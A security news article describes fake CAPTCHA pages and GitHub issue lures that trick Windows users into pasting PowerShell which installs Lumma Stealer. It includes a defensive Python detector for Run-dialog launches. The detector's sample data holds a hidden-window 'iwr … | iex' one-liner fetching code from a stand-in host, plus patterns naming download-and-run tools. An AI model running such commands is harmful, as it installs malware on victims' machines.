
Scammers using fake human verification pages to target Windows users with malware


Fake human verification pages continue to pose a significant threat to Windows users, with security researchers uncovering a new campaign that highlights the dangers of falling victim to these malicious pages. Palo Alto Networks’ Unit 42 recently identified seven CAPTCHA-style human verification pages that were designed to deceive unsuspecting users.

According to Unit 42’s threat hunter Paul Michaud II, these pages prompt users to paste PowerShell script into a Run window under the guise of completing a human verification process. However, the copied script actually downloads and executes the Lumma Stealer malware onto the victim’s system. This deceptive tactic aims to trick users into unknowingly installing harmful software that can compromise their sensitive information and security.

In a more recent development, CloudSEK researchers have discovered additional active fake human verification pages hosted on various providers and using content delivery networks to distribute the Lumma Stealer malware. Clicking the “I’m not a robot” button on these pages silently copies the malicious PowerShell script to the user’s clipboard. When the user pastes it into the Run dialog box, the script launches hidden PowerShell commands that ultimately install the Lumma Stealer malware.
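The infection chain above has a recognisable telemetry shape: a script host (PowerShell) started from the Run dialog, whose parent is explorer.exe, with a command line that hides its window and fetches and executes remote content. The following is an added example for defenders, not code from the article, Unit 42 or CloudSEK. It scores process-creation events against that shape. It assumes the events have already been parsed from a Sysmon Event ID 1 (or equivalent EDR) feed into dicts with `pid`, `parent`, `image` and `cmdline` fields; the indicator patterns are heuristics chosen for this example, not a vendor signature, and the sample events are constructed, not real telemetry.

```python
"""Heuristic triage of 'paste this into the Run dialog' (fake CAPTCHA) launches.

Added example, not from the article or the vendors it cites. Assumes a
process-creation feed already parsed into dicts; the field names, the
indicator patterns and the sample records below are all constructed.
"""
import re

# Commands typed or pasted into the Windows Run dialog are spawned by explorer.exe,
# so an interactive script-host launch with suspicious flags is the core signal.
LAUNCHER_PARENT = "explorer.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Assumed heuristics: each pattern captures one trait of a download-and-run one-liner.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I),
}


def _basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, matched indicator names) for one process-creation event.

    Non-script-host images score 0. Each matched indicator adds 1; a script host
    started by explorer.exe *with* at least one indicator adds 2 more, because
    that combination is the Run-dialog paste pattern rather than admin scripting.
    """
    if _basename(event["image"]) not in SCRIPT_HOSTS:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    score = len(hits)
    if hits and _basename(event["parent"]) == LAUNCHER_PARENT:
        score += 2
    return score, hits


def triage(events, threshold=3):
    """Return (pid, score, hits) for every event at or above the alert threshold."""
    alerts = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            alerts.append((event["pid"], score, hits))
    return alerts


# Constructed sample events (not real telemetry). Event 3 mimics the fake-CAPTCHA
# paste: hidden window, remote fetch, inline execution, parent explorer.exe.
SAMPLE_EVENTS = [
    {"pid": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 3, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://captcha-lure.invalid/verify.txt | iex"'},
    {"pid": 4, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": r"pwsh.exe -NoProfile -File .\build.ps1"},
]

if __name__ == "__main__":
    for pid, score, hits in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: score {score}, indicators {hits}")
```

With the constructed sample only event 3 crosses the threshold (score 5: three indicators plus the explorer.exe bonus); the legitimate scheduled script with `-ExecutionPolicy Bypass` scores 1 and the developer's `pwsh -File` scores 0, which is the point of weighting the combination rather than any single flag. On an endpoint under investigation, the Run dialog keeps its command history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so that key is the forensic artifact to pull alongside the process-creation record to recover what the user actually pasted.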

The malware’s capabilities include establishing connections with attacker-controlled domains, posing a severe threat to the infected system’s security. Additionally, the researchers noted that the malware delivered through these fake human verification pages can be easily modified, allowing threat actors to adapt their tactics and evade detection.

One of the key questions that arises from these findings is how targeted users are directed to these malicious pages in the first place. Security researcher Ax Sharma uncovered a sophisticated tactic where malware peddlers exploit legitimate GitHub servers to lure users into visiting fake human verification pages. By creating fake “issues” on open source repositories on GitHub and claiming the presence of security vulnerabilities, the perpetrators trigger email alerts to contributors and subscribers of these repositories.

These email alerts, seemingly originating from the GitHub Security Team, direct recipients to the malicious domain github-scanner[.]com, where a fake human verification page is waiting to deliver a trojan to unsuspecting victims. This manipulation of legitimate platforms like GitHub demonstrates the evolving strategies employed by cybercriminals to trick users into downloading malware unknowingly.

As the prevalence of fake human verification pages continues to grow, users need to remain vigilant and exercise caution when interacting with online content. It is essential to stay informed about the latest cybersecurity threats and be wary of unexpected emails or alerts that prompt actions such as running PowerShell scripts. By maintaining a proactive approach to cybersecurity and adopting best practices for online safety, users can better protect themselves against the evolving tactics of malicious actors.
